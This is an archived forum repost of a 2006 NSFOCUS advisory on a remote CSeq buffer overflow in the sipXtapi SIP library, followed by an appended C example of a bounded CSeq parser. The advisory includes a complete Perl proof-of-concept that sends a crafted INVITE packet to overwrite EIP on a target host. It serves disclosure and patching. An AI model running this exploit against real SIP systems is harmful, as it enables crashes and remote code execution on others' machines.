EvilOctal Information Security Team Technical Discussion Group's Archiver

睡猫 2006-8-2 23:53

[Repost] SIPfoundry SIPXtapi CSeq Handling Remote Overflow Vulnerability

Source: NSFOCUS

Published: 2006-07-10
Updated: 2006-07-11

Affected systems:
SIP Foundry SipXtapi
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 18906

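sipXtapi is a simple, easy-to-use software development kit (SDK) for building standalone or integrated SIP clients.

The sipXtapi library has a buffer overflow vulnerability when parsing the CSeq field; a remote attacker may exploit it to execute arbitrary commands on the server.

A remote attacker can trigger this vulnerability by sending a CSeq field larger than 24 bytes, gaining control of EIP and executing arbitrary code.

<*Source: Michael Thumann ([email]mthumann@ernw.de[/email])
  
  Links: [url]http://secunia.com/advisories/20997/print/[/url]
         [url]http://marc.theaimsgroup.com/?l=bugtraq&m=115255370208995&w=2[/url]
*>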

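Test method:
--------------------------------------------------------------------------------

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!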

#!/usr/bin/perl
# PoC Exploit By [email]mthumann@ernw.de[/email]
# Remote Buffer Overflow in sipXtapi

use IO::Socket;
#use strict;


print "sipXtapi Exploit by Michael Thumann \n\n";

if (not $ARGV[0]) {
      print "Usage: sipx.pl <host>\n";
exit;}

$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =<<END;
INVITE sip:user\@$source SIP/2.0\r
To: <sip:$target:$target_port>\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"<sip:$target:3277>\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: <sip:$source:5059>\r
\r
END

print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
print "Done.\n";

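Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

SIP Foundry
-----------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page: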

[url]http://www.sipfoundry.org/index.html[/url]
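
For contrast with the overflow described in the advisory above, here is a bounded CSeq parser that rejects an oversized value instead of copying it. This is an added example, not code from the post or from sipXtapi; the names parse_cseq, skip_ws and CSEQ_METHOD_MAX are hypothetical, the 32-byte method cap is an assumption, and the "below 2^31" limit on the sequence number comes from RFC 3261.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define CSEQ_METHOD_MAX 32 /* assumed cap on method length, not from the page */

static size_t skip_ws(const char *s, size_t i, size_t len)
{
    while (i < len && (s[i] == ' ' || s[i] == '\t'))
        i++;
    return i;
}

/* Parse a CSeq value ("<number> <METHOD>"); 0 on success, -1 on rejection. */
int parse_cseq(const char *v, size_t len, uint32_t *seq,
               char method[CSEQ_METHOD_MAX + 1])
{
    size_t i = skip_ws(v, 0, len), start = i, mlen = 0;
    uint64_t n = 0;
    /* Sequence number: digits only, must stay below 2^31 (RFC 3261). */
    for (; i < len && isdigit((unsigned char)v[i]); i++) {
        n = n * 10 + (uint64_t)(v[i] - '0');
        if (n >= 0x80000000ULL)
            return -1; /* reject rather than truncate or copy */
    }
    if (i == start || i == len || (v[i] != ' ' && v[i] != '\t'))
        return -1; /* no digits, or no separator before the method */
    i = skip_ws(v, i, len);
    /* Method: every write is checked against the destination size. */
    for (; i < len && isgraph((unsigned char)v[i]); i++) {
        if (mlen == CSEQ_METHOD_MAX)
            return -1;
        method[mlen++] = v[i];
    }
    if (mlen == 0 || skip_ws(v, i, len) != len)
        return -1; /* missing method or trailing garbage */
    method[mlen] = '\0';
    *seq = (uint32_t)n;
    return 0;
}

int main(void)
{
    const char *in[] = { "314159 INVITE", "99999999999999999999999999 INVITE" }; /* constructed */
    uint32_t seq; char m[CSEQ_METHOD_MAX + 1];
    for (int k = 0; k < 2; k++)
        printf("%s -> %d\n", in[k], parse_cseq(in[k], strlen(in[k]), &seq, m));
    return 0;
}
```

The parser never stores the digit run, so its length cannot affect any buffer; only the numeric value is range-checked.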
